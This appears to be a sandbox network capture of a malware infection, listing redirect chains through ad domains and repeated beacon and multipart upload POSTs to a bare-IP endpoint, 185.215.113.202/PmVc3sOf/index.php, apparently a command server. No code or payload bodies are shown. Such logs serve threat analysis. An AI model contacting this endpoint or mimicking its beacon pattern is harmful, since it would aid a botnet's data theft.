GET /afu.php?zoneid=1851513 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: vexacion.com
Connection: Keep-Alive
Cookie: OAID=bf944af6294442acb2e1ed3662042e28; oaidts=1631162282

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 09 Sep 2021 04:41:59 GMT
Content-Type: text/html; charset=utf8
Transfer-Encoding: chunked
Connection: keep-alive
X-Trace-Id: 447efe94b3126395f890a572dd5ca60f
Link: <https://propeller-tracking.com>; rel="preconnect dns-prefetch",<https://my.rtmark.net>; rel="preconnect dns-prefetch"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Allow-Headers: Accept, Content-Type, Content-Length, Accept-Encoding
Access-Control-Max-Age: 86400
Pragma: no-cache
Cache-Control: no-transform, no-store, no-cache, must-revalidate, max-age=0
Expires: Tue, 11 Jan 1994 10:00:00 GMT
Timing-Allow-Origin: *
Set-Cookie: OAID=bf944af6294442acb2e1ed3662042e28; expires=Fri, 09 Sep 2022 04:41:59 GMT; path=/
Set-Cookie: oaidts=1631162282; expires=Fri, 09 Sep 2022 04:41:59 GMT; path=/
Strict-Transport-Security: max-age=1
X-Content-Type-Options: nosniff
Timing-Allow-Origin: *
Content-Encoding: gzip
GET

http://vexacion.com/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: vexacion.com
Connection: Keep-Alive
Cookie: OAID=bf944af6294442acb2e1ed3662042e28; oaidts=1631162282

Response

HTTP/1.1 204 No Content

Server: nginx
Date: Thu, 09 Sep 2021 04:42:03 GMT
Connection: keep-alive
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Pragma: public
Cache-Control: public, must-revalidate, proxy-revalidate
POST

http://185.215.113.202/PmVc3sOf/index.php

Request

POST /PmVc3sOf/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.202
Content-Length: 83
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 09 Sep 2021 04:42:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.202/PmVc3sOf/index.php?scr=1

Request

POST /PmVc3sOf/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----1bbc1eb46ce8d3a516cc1220536fd234
Host: 185.215.113.202
Content-Length: 37071
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 09 Sep 2021 04:42:45 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
DNS

www.directdexchange.com

Request

www.directdexchange.com

IN A

Response

www.directdexchange.com

IN CNAME

directdexchange.com

directdexchange.com

IN A

35.201.70.46
GET

http://www.directdexchange.com/jump/next.php?r=2087215

Request

GET /jump/next.php?r=2087215 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: www.directdexchange.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: openresty
Date: Thu, 09 Sep 2021 04:45:05 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Access-Control-Allow-Origin: *
Content-Encoding: gzip
Via: 1.1 google
GET

http://www.directdexchange.com/jump/next.php?stamat=m%7C%2CwI2Z7Y2LqB1dwP0dEdHP3xP.19a%2C2t5FkDDYpjxJXsMWHSh7wKsTFo_9DWdVnHcBDLzDvAWvvhwYRZDYe0ZsowfF7dmW&cbrandom=0.3040250545102319&cbtitle=&cbiframe=0&cbWidth=1280&cbHeight=626&cbdescription=&cbkeywords=&cbref=

Request

GET /jump/next.php?stamat=m%7C%2CwI2Z7Y2LqB1dwP0dEdHP3xP.19a%2C2t5FkDDYpjxJXsMWHSh7wKsTFo_9DWdVnHcBDLzDvAWvvhwYRZDYe0ZsowfF7dmW&cbrandom=0.3040250545102319&cbtitle=&cbiframe=0&cbWidth=1280&cbHeight=626&cbdescription=&cbkeywords=&cbref= HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.directdexchange.com/jump/next.php?r=2087215
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: www.directdexchange.com
Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily

Server: openresty
Date: Thu, 09 Sep 2021 04:45:08 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Access-Control-Allow-Origin: *
Location: http://www.directdexchange.com/script/i.php?stamat=m%7C%2C%2CgiPmI2FqtGU3Bp-GH0dEdHP3xP.d14%2CEswcf3ib5_5DhT8WJt2HotyprPr9mbCyTniCgiAE7tnByL3-lTvr9E6F6Sks0acq3cjm3L-GK_FCmmX0Lur325McttdHxnktv7TexjbJamIuzzOIMPgdUR8SHAI2Vs7svrWMuMxZuhglCmP_hXbL-93mJOuFui8ZutAIEbiKaPXSsxroIq-PdZqcudeKhgigIh4ylc_p6ro3oBIr9LrkSHoiXMxAlu1TII4sKYV-I4fsqKJCA5WpGdEt7JuVA354kee__A5YAFpUDnrXbizwo9bBdD3bEwjQPwmz0zFzInkHI8zUZrBbD52ZmJEj9JipxqisYVq13gNueEcRdtkRRxpAHiNKrdLxpVT_5mzTl5tDyf2UGDT9X7mN5hI_FBBr4au_EhkG95jw8cLAqG6xxwQpUelLFKCiNtc-RaZLrZyhh3hp6oNx8vFoNmUA2XllgDFm6RxvJy2m5mRg_jwfiWotBt0PvL6ca5dBSVTzL00NN-8YwmnhzVOQGY5lHY-Sk1j1B2KDlRQtuPmwgeUIMw%2C%2C
Via: 1.1 google
GET

http://www.directdexchange.com/script/i.php?stamat=m%7C%2C%2CgiPmI2FqtGU3Bp-GH0dEdHP3xP.d14%2CEswcf3ib5_5DhT8WJt2HotyprPr9mbCyTniCgiAE7tnByL3-lTvr9E6F6Sks0acq3cjm3L-GK_FCmmX0Lur325McttdHxnktv7TexjbJamIuzzOIMPgdUR8SHAI2Vs7svrWMuMxZuhglCmP_hXbL-93mJOuFui8ZutAIEbiKaPXSsxroIq-PdZqcudeKhgigIh4ylc_p6ro3oBIr9LrkSHoiXMxAlu1TII4sKYV-I4fsqKJCA5WpGdEt7JuVA354kee__A5YAFpUDnrXbizwo9bBdD3bEwjQPwmz0zFzInkHI8zUZrBbD52ZmJEj9JipxqisYVq13gNueEcRdtkRRxpAHiNKrdLxpVT_5mzTl5tDyf2UGDT9X7mN5hI_FBBr4au_EhkG95jw8cLAqG6xxwQpUelLFKCiNtc-RaZLrZyhh3hp6oNx8vFoNmUA2XllgDFm6RxvJy2m5mRg_jwfiWotBt0PvL6ca5dBSVTzL00NN-8YwmnhzVOQGY5lHY-Sk1j1B2KDlRQtuPmwgeUIMw%2C%2C

Request

GET /script/i.php?stamat=m%7C%2C%2CgiPmI2FqtGU3Bp-GH0dEdHP3xP.d14%2CEswcf3ib5_5DhT8WJt2HotyprPr9mbCyTniCgiAE7tnByL3-lTvr9E6F6Sks0acq3cjm3L-GK_FCmmX0Lur325McttdHxnktv7TexjbJamIuzzOIMPgdUR8SHAI2Vs7svrWMuMxZuhglCmP_hXbL-93mJOuFui8ZutAIEbiKaPXSsxroIq-PdZqcudeKhgigIh4ylc_p6ro3oBIr9LrkSHoiXMxAlu1TII4sKYV-I4fsqKJCA5WpGdEt7JuVA354kee__A5YAFpUDnrXbizwo9bBdD3bEwjQPwmz0zFzInkHI8zUZrBbD52ZmJEj9JipxqisYVq13gNueEcRdtkRRxpAHiNKrdLxpVT_5mzTl5tDyf2UGDT9X7mN5hI_FBBr4au_EhkG95jw8cLAqG6xxwQpUelLFKCiNtc-RaZLrZyhh3hp6oNx8vFoNmUA2XllgDFm6RxvJy2m5mRg_jwfiWotBt0PvL6ca5dBSVTzL00NN-8YwmnhzVOQGY5lHY-Sk1j1B2KDlRQtuPmwgeUIMw%2C%2C HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.directdexchange.com/jump/next.php?r=2087215
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: www.directdexchange.com
Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily

Server: openresty
Date: Thu, 09 Sep 2021 04:45:08 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Access-Control-Allow-Origin: *
Location: https://dist.acnav.online/?c=ac&subid=16311627082587707187245671897712012&cid=2087215
Referrer-Policy: no-referrer
Via: 1.1 google
DNS

dist.acnav.online

Request

dist.acnav.online

IN A

Response

dist.acnav.online

IN CNAME

hidden-roadrunner-k7np31v1e60rzrp6qya5k4lv.herokudns.com

hidden-roadrunner-k7np31v1e60rzrp6qya5k4lv.herokudns.com

IN A

52.20.78.240

hidden-roadrunner-k7np31v1e60rzrp6qya5k4lv.herokudns.com

IN A

3.232.242.170

hidden-roadrunner-k7np31v1e60rzrp6qya5k4lv.herokudns.com

IN A

54.91.59.199

hidden-roadrunner-k7np31v1e60rzrp6qya5k4lv.herokudns.com

IN A

3.220.57.224
POST

http://185.215.113.202/PmVc3sOf/index.php

Request

POST /PmVc3sOf/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.202
Content-Length: 83
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 09 Sep 2021 04:45:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.202/PmVc3sOf/index.php?scr=1

Request

POST /PmVc3sOf/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----0dd47af72a68ec92fc74293c917a5abb
Host: 185.215.113.202
Content-Length: 54998
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 09 Sep 2021 04:45:47 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
DNS

collect.installeranalytics.com

Request

collect.installeranalytics.com

IN A

Response

collect.installeranalytics.com

IN A

3.209.18.1

collect.installeranalytics.com

IN A

3.232.36.43
DNS

crl.rootg2.amazontrust.com

Request

crl.rootg2.amazontrust.com

IN A

Response

crl.rootg2.amazontrust.com

IN A

65.9.84.17

crl.rootg2.amazontrust.com

IN A

65.9.84.134

crl.rootg2.amazontrust.com

IN A

65.9.84.214

crl.rootg2.amazontrust.com

IN A

65.9.84.167
GET

http://crl.rootg2.amazontrust.com/rootg2.crl

Request

GET /rootg2.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.rootg2.amazontrust.com

Response

HTTP/1.1 200 OK

Content-Type: application/pkix-crl
Content-Length: 660
Connection: keep-alive
Date: Thu, 24 Jun 2021 18:12:29 GMT
Last-Modified: Thu, 24 Jun 2021 18:06:01 GMT
ETag: "b7ce356b25b5a9c58686624f0f47c8ae"
Cache-Control: public
Expires: Tue, 21 Jun 2022 00:00:00 GMT
x-amz-version-id: w0MrPe9yAAGnHtNfoGZHKod4XyNPpEX.
Accept-Ranges: bytes
Server: AmazonS3
X-Cache: Hit from cloudfront
Via: 1.1 025692f042f48f4d5f15fa44d00c09ee.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: AMS1-C1
X-Amz-Cf-Id: tTvEFW27Hhv7-bxVQMFoNpWPNXfrLNlsRFEqpAvihtxdFfLNDSwuJQ==
Age: 6604567
DNS

crl.rootca1.amazontrust.com

Request

crl.rootca1.amazontrust.com

IN A

Response

crl.rootca1.amazontrust.com

IN A

65.9.84.134

crl.rootca1.amazontrust.com

IN A

65.9.84.17

crl.rootca1.amazontrust.com

IN A

65.9.84.167

crl.rootca1.amazontrust.com

IN A

65.9.84.214
GET

http://crl.rootca1.amazontrust.com/rootca1.crl

Request

GET /rootca1.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.rootca1.amazontrust.com

Response

HTTP/1.1 200 OK

Content-Type: application/pkix-crl
Content-Length: 493
Connection: keep-alive
Date: Thu, 24 Jun 2021 18:11:44 GMT
Last-Modified: Thu, 24 Jun 2021 18:05:55 GMT
ETag: "743a25b75f830c0754c9e362c7454acb"
Cache-Control: public
Expires: Tue, 21 Jun 2022 00:00:00 GMT
x-amz-version-id: st8Fn0XT6jzZdZTl8McDLRRA0Tpnr3bW
Accept-Ranges: bytes
Server: AmazonS3
X-Cache: Hit from cloudfront
Via: 1.1 d3d7cb5a7de36091f7284546b4190a33.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: AMS1-C1
X-Amz-Cf-Id: Z3E77B-yWa8sQoUc_KMo5NRlzV0iFyTwBtuSdoGOYidbQwSUWsnzwA==
Age: 6604613
DNS

collect.installeranalytics.com

Request

collect.installeranalytics.com

IN A

Response

collect.installeranalytics.com

IN A

3.209.18.1

collect.installeranalytics.com

IN A

3.232.36.43
POST

http://185.215.113.202/PmVc3sOf/index.php

Request

POST /PmVc3sOf/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.202
Content-Length: 83
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 09 Sep 2021 04:48:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.202/PmVc3sOf/index.php?scr=1

Request

POST /PmVc3sOf/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----fa01bbe3dc5821c4227e9e1d3c823e83
Host: 185.215.113.202
Content-Length: 55007
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 09 Sep 2021 04:48:48 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
DNS

dist.acnav.online

Request

dist.acnav.online

IN A

Response

dist.acnav.online

IN CNAME

hidden-roadrunner-k7np31v1e60rzrp6qya5k4lv.herokudns.com

hidden-roadrunner-k7np31v1e60rzrp6qya5k4lv.herokudns.com

IN A

3.220.57.224

hidden-roadrunner-k7np31v1e60rzrp6qya5k4lv.herokudns.com

IN A

54.91.59.199

hidden-roadrunner-k7np31v1e60rzrp6qya5k4lv.herokudns.com

IN A

52.20.78.240

hidden-roadrunner-k7np31v1e60rzrp6qya5k4lv.herokudns.com

IN A

3.232.242.170
DNS

112.t.keepitpumpin.io

Request

112.t.keepitpumpin.io

IN A

Response

112.t.keepitpumpin.io

IN A

212.83.164.37
DNS

113.t.keepitpumpin.io

Request

113.t.keepitpumpin.io

IN A

Response

113.t.keepitpumpin.io

IN A

212.83.164.166
DNS

111.t.keepitpumpin.io

Request

111.t.keepitpumpin.io

IN A

Response

111.t.keepitpumpin.io

IN A

212.83.141.61
DNS

114.t.keepitpumpin.io

Request

114.t.keepitpumpin.io

IN A

Response

114.t.keepitpumpin.io

IN A

212.83.164.213
DNS

115.t.keepitpumpin.io

Request

115.t.keepitpumpin.io

IN A

Response

115.t.keepitpumpin.io

IN A

212.83.166.214
POST

http://185.215.113.202/PmVc3sOf/index.php

Request

POST /PmVc3sOf/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.202
Content-Length: 83
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 09 Sep 2021 04:51:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.202/PmVc3sOf/index.php?scr=1

Request

POST /PmVc3sOf/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----d287ab72140b44071e69e6255b859cec
Host: 185.215.113.202
Content-Length: 55134
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 09 Sep 2021 04:51:51 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
DNS

110.t.keepitpumpin.io

Request

110.t.keepitpumpin.io

IN A

Response

110.t.keepitpumpin.io

IN A

163.172.204.15
DNS

vexacion.com

Request

vexacion.com

IN A

Response

vexacion.com

IN A

139.45.197.236
GET

http://vexacion.com/afu.php?id=1294231

Request

GET /afu.php?id=1294231 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: vexacion.com
Connection: Keep-Alive
Cookie: OAID=bf944af6294442acb2e1ed3662042e28; oaidts=1631162282

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 09 Sep 2021 04:53:42 GMT
Content-Type: text/html; charset=utf8
Transfer-Encoding: chunked
Connection: keep-alive
X-Trace-Id: 6aa7ee9afa098185466dbfbccab98479
Link: <https://propeller-tracking.com>; rel="preconnect dns-prefetch",<https://my.rtmark.net>; rel="preconnect dns-prefetch"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Allow-Headers: Accept, Content-Type, Content-Length, Accept-Encoding
Access-Control-Max-Age: 86400
Pragma: no-cache
Cache-Control: no-transform, no-store, no-cache, must-revalidate, max-age=0
Expires: Tue, 11 Jan 1994 10:00:00 GMT
Timing-Allow-Origin: *
Set-Cookie: OAID=bf944af6294442acb2e1ed3662042e28; expires=Fri, 09 Sep 2022 04:53:42 GMT; path=/
Set-Cookie: oaidts=1631162282; expires=Fri, 09 Sep 2022 04:53:42 GMT; path=/
Strict-Transport-Security: max-age=1
X-Content-Type-Options: nosniff
Timing-Allow-Origin: *
Content-Encoding: gzip
DNS

v.whatsapp.net

Request

v.whatsapp.net

IN A

Response

v.whatsapp.net

IN CNAME

mmg.whatsapp.net

mmg.whatsapp.net

IN CNAME

mmx-ds.cdn.whatsapp.net

mmx-ds.cdn.whatsapp.net

IN A

31.13.64.51
DNS

114.t.keepitpumpin.io

Request

114.t.keepitpumpin.io

IN A

Response

114.t.keepitpumpin.io

IN A

212.83.164.213
DNS

v.whatsapp.net

Request

v.whatsapp.net

IN A

Response

v.whatsapp.net

IN CNAME

mmg.whatsapp.net

mmg.whatsapp.net

IN CNAME

mmx-ds.cdn.whatsapp.net

mmx-ds.cdn.whatsapp.net

IN A

31.13.64.51
DNS

v.whatsapp.net

Request

v.whatsapp.net

IN A

Response

v.whatsapp.net

IN CNAME

mmg.whatsapp.net

mmg.whatsapp.net

IN CNAME

mmx-ds.cdn.whatsapp.net

mmx-ds.cdn.whatsapp.net

IN A

31.13.64.51
DNS

v.whatsapp.net

Request

v.whatsapp.net

IN A

Response

v.whatsapp.net

IN CNAME

mmg.whatsapp.net

mmg.whatsapp.net

IN CNAME

mmx-ds.cdn.whatsapp.net

mmx-ds.cdn.whatsapp.net

IN A

31.13.64.51
DNS

v.whatsapp.net

Request

v.whatsapp.net

IN A

Response

v.whatsapp.net

IN CNAME

mmg.whatsapp.net

mmg.whatsapp.net

IN CNAME

mmx-ds.cdn.whatsapp.net

mmx-ds.cdn.whatsapp.net

IN A

31.13.64.51
POST

http://185.215.113.202/PmVc3sOf/index.php?scr=1

Request

POST /PmVc3sOf/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----d23941275ef524a546d5921aa8c5af2d
Host: 185.215.113.202
Content-Length: 37490
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 09 Sep 2021 04:54:54 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
POST

http://185.215.113.202/PmVc3sOf/index.php

Request

POST /PmVc3sOf/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.202
Content-Length: 83
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 09 Sep 2021 04:54:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

v.whatsapp.net

Request

v.whatsapp.net

IN A

Response

v.whatsapp.net

IN CNAME

mmg.whatsapp.net

mmg.whatsapp.net

IN CNAME

mmx-ds.cdn.whatsapp.net

mmx-ds.cdn.whatsapp.net

IN A

31.13.64.51
DNS

v.whatsapp.net

Request

v.whatsapp.net

IN A

Response

v.whatsapp.net

IN CNAME

mmg.whatsapp.net

mmg.whatsapp.net

IN CNAME

mmx-ds.cdn.whatsapp.net

mmx-ds.cdn.whatsapp.net

IN A

31.13.64.51
DNS

v.whatsapp.net

Request

v.whatsapp.net

IN A

Response

v.whatsapp.net

IN CNAME

mmg.whatsapp.net

mmg.whatsapp.net

IN CNAME

mmx-ds.cdn.whatsapp.net

mmx-ds.cdn.whatsapp.net

IN A

31.13.64.51
DNS

data1.wotstats.com

Request

data1.wotstats.com

IN A

Response

data1.wotstats.com

IN A

45.76.0.226
GET

http://data1.wotstats.com/ix

Request

GET /ix HTTP/1.1
Accept-Encoding: gzip, deflate, br
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:23.0) Gecko/20100101 Firefox/23.0
Host: data1.wotstats.com
Upgrade-Insecure-Requests: 1

Response

HTTP/1.1 200 OK

Connection: close
Content-Type: text/plain;charset=utf-8
Expires: -1
Content-Length: 12
Server: Jetty(9.4.32.v20200930)
DNS

v.whatsapp.net

Request

v.whatsapp.net

IN A

Response

v.whatsapp.net

IN CNAME

mmg.whatsapp.net

mmg.whatsapp.net

IN CNAME

mmx-ds.cdn.whatsapp.net

mmx-ds.cdn.whatsapp.net

IN A

31.13.64.51
DNS

v.whatsapp.net

Request

v.whatsapp.net

IN A

Response

v.whatsapp.net

IN CNAME

mmg.whatsapp.net

mmg.whatsapp.net

IN CNAME

mmx-ds.cdn.whatsapp.net

mmx-ds.cdn.whatsapp.net

IN A

31.13.64.51
DNS

v.whatsapp.net

Request

v.whatsapp.net

IN A

Response

v.whatsapp.net

IN CNAME

mmg.whatsapp.net

mmg.whatsapp.net

IN CNAME

mmx-ds.cdn.whatsapp.net

mmx-ds.cdn.whatsapp.net

IN A

31.13.64.51
DNS

v.whatsapp.net

Request

v.whatsapp.net

IN A

Response

v.whatsapp.net

IN CNAME

mmg.whatsapp.net

mmg.whatsapp.net

IN CNAME

mmx-ds.cdn.whatsapp.net

mmx-ds.cdn.whatsapp.net

IN A

31.13.64.51
DNS

data1.wotstats.com

Request

data1.wotstats.com

IN A

Response

data1.wotstats.com

IN A

45.76.0.226
GET

http://data1.wotstats.com/ix

Request

GET /ix HTTP/1.1
Accept-Encoding: gzip, deflate, br
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:23.0) Gecko/20100101 Firefox/23.0
Host: data1.wotstats.com
Upgrade-Insecure-Requests: 1

Response

HTTP/1.1 200 OK

Connection: close
Content-Type: text/plain;charset=utf-8
Expires: -1
Content-Length: 12
Server: Jetty(9.4.32.v20200930)
DNS

v.whatsapp.net

Request

v.whatsapp.net

IN A

Response

v.whatsapp.net

IN CNAME

mmg.whatsapp.net

mmg.whatsapp.net

IN CNAME

mmx-ds.cdn.whatsapp.net

mmx-ds.cdn.whatsapp.net

IN A

31.13.64.51
DNS

v.whatsapp.net

Request

v.whatsapp.net

IN A

Response

v.whatsapp.net

IN CNAME

mmg.whatsapp.net

mmg.whatsapp.net

IN CNAME

mmx-ds.cdn.whatsapp.net

mmx-ds.cdn.whatsapp.net

IN A

31.13.64.51
DNS

v.whatsapp.net

Request

v.whatsapp.net

IN A

Response

v.whatsapp.net

IN CNAME

mmg.whatsapp.net

mmg.whatsapp.net

IN CNAME

mmx-ds.cdn.whatsapp.net

mmx-ds.cdn.whatsapp.net

IN A

31.13.64.51
DNS

v.whatsapp.net

Request

v.whatsapp.net

IN A

Response

v.whatsapp.net

IN CNAME

mmg.whatsapp.net

mmg.whatsapp.net

IN CNAME

mmx-ds.cdn.whatsapp.net

mmx-ds.cdn.whatsapp.net

IN A

31.13.64.51
DNS

v.whatsapp.net

Request

v.whatsapp.net

IN A

Response

v.whatsapp.net

IN CNAME

mmg.whatsapp.net

mmg.whatsapp.net

IN CNAME

mmx-ds.cdn.whatsapp.net

mmx-ds.cdn.whatsapp.net

IN A

31.13.64.51
DNS

v.whatsapp.net

Request

v.whatsapp.net

IN A

Response

v.whatsapp.net

IN CNAME

mmg.whatsapp.net

mmg.whatsapp.net

IN CNAME

mmx-ds.cdn.whatsapp.net

mmx-ds.cdn.whatsapp.net

IN A

31.13.64.51
DNS

data1.wotstats.com

Request

data1.wotstats.com

IN A

Response

data1.wotstats.com

IN A

45.76.0.226
GET

http://data1.wotstats.com/ix

Request

GET /ix HTTP/1.1
Accept-Encoding: gzip, deflate, br
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:23.0) Gecko/20100101 Firefox/23.0
Host: data1.wotstats.com
Upgrade-Insecure-Requests: 1

Response

HTTP/1.1 200 OK

Connection: close
Content-Type: text/plain;charset=utf-8
Expires: -1
Content-Length: 12
Server: Jetty(9.4.32.v20200930)
DNS

v.whatsapp.net

Request

v.whatsapp.net

IN A

Response

v.whatsapp.net

IN CNAME

mmg.whatsapp.net

mmg.whatsapp.net

IN CNAME

mmx-ds.cdn.whatsapp.net

mmx-ds.cdn.whatsapp.net

IN A

31.13.64.51
DNS

v.whatsapp.net

Request

v.whatsapp.net

IN A

Response

v.whatsapp.net

IN CNAME

mmg.whatsapp.net

mmg.whatsapp.net

IN CNAME

mmx-ds.cdn.whatsapp.net

mmx-ds.cdn.whatsapp.net

IN A

31.13.64.51
DNS

v.whatsapp.net

Request

v.whatsapp.net

IN A

Response

v.whatsapp.net

IN CNAME

mmg.whatsapp.net

mmg.whatsapp.net

IN CNAME

mmx-ds.cdn.whatsapp.net

mmx-ds.cdn.whatsapp.net

IN A

31.13.64.51
DNS

v.whatsapp.net

Request

v.whatsapp.net

IN A

Response

v.whatsapp.net

IN CNAME

mmg.whatsapp.net

mmg.whatsapp.net

IN CNAME

mmx-ds.cdn.whatsapp.net

mmx-ds.cdn.whatsapp.net

IN A

31.13.64.51
DNS

v.whatsapp.net

Request

v.whatsapp.net

IN A

Response

v.whatsapp.net

IN CNAME

mmg.whatsapp.net

mmg.whatsapp.net

IN CNAME

mmx-ds.cdn.whatsapp.net

mmx-ds.cdn.whatsapp.net

IN A

31.13.64.51
DNS

v.whatsapp.net

Request

v.whatsapp.net

IN A

Response

v.whatsapp.net

IN CNAME

mmg.whatsapp.net

mmg.whatsapp.net

IN CNAME

mmx-ds.cdn.whatsapp.net

mmx-ds.cdn.whatsapp.net

IN A

31.13.64.51
DNS

v.whatsapp.net

Request

v.whatsapp.net

IN A

Response

v.whatsapp.net

IN CNAME

mmg.whatsapp.net

mmg.whatsapp.net

IN CNAME

mmx-ds.cdn.whatsapp.net

mmx-ds.cdn.whatsapp.net

IN A

31.13.64.51
DNS

v.whatsapp.net

Request

v.whatsapp.net

IN A

Response

v.whatsapp.net

IN CNAME

mmg.whatsapp.net

mmg.whatsapp.net

IN CNAME

mmx-ds.cdn.whatsapp.net

mmx-ds.cdn.whatsapp.net

IN A

31.13.64.51
DNS

v.whatsapp.net

Request

v.whatsapp.net

IN A

Response

v.whatsapp.net

IN CNAME

mmg.whatsapp.net

mmg.whatsapp.net

IN CNAME

mmx-ds.cdn.whatsapp.net

mmx-ds.cdn.whatsapp.net

IN A

31.13.64.51
DNS

v.whatsapp.net

Request

v.whatsapp.net

IN A

Response

v.whatsapp.net

IN CNAME

mmg.whatsapp.net

mmg.whatsapp.net

IN CNAME

mmx-ds.cdn.whatsapp.net

mmx-ds.cdn.whatsapp.net

IN A

31.13.64.51
DNS

v.whatsapp.net

Request

v.whatsapp.net

IN A

Response

v.whatsapp.net

IN CNAME

mmg.whatsapp.net

mmg.whatsapp.net

IN CNAME

mmx-ds.cdn.whatsapp.net

mmx-ds.cdn.whatsapp.net

IN A

31.13.64.51
DNS

v.whatsapp.net

Request

v.whatsapp.net

IN A

Response

v.whatsapp.net

IN CNAME

mmg.whatsapp.net

mmg.whatsapp.net

IN CNAME

mmx-ds.cdn.whatsapp.net

mmx-ds.cdn.whatsapp.net

IN A

31.13.64.51
DNS

v.whatsapp.net

Request

v.whatsapp.net

IN A

Response

v.whatsapp.net

IN CNAME

mmg.whatsapp.net

mmg.whatsapp.net

IN CNAME

mmx-ds.cdn.whatsapp.net

mmx-ds.cdn.whatsapp.net

IN A

31.13.64.51
DNS

v.whatsapp.net

Request

v.whatsapp.net

IN A
DNS

v.whatsapp.net

Request

v.whatsapp.net

IN A
DNS

v.whatsapp.net

Request

v.whatsapp.net

IN A
DNS

v.whatsapp.net

Request

v.whatsapp.net

IN A
